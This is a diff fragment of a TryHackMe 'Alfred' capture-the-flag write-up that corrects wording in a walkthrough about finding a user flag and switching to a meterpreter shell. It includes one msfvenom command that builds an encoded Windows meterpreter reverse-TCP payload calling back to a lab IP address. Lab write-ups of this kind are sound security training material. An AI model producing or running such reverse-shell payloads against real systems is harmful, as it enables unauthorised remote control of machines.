DevonDF/CTF-Writeups/TryHackMe/Alfred/Alfred.md

 ![](2021-03-10-11-32-09.png)

-I then navigate over to the C:/Users/ and see that there is a user named 'bruce'.
-On their Desktop holds the user flag.
+I then navigate over to the C:/Users/bruce, on their Desktop holds the user flag.

 ## Switching Shells

-Following with TryHackMe, I attempt to switch shells over to meterpreter to make priviledge escalation easier.
+Following with TryHackMe, I attempt to switch shells over to meterpreter to make privilege escalation easier.
 To do this, I generated a meterpreter reverse shell payload using msfvenom:

 ``msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.3.207 LPORT=4443 -f exe -o shell.exe``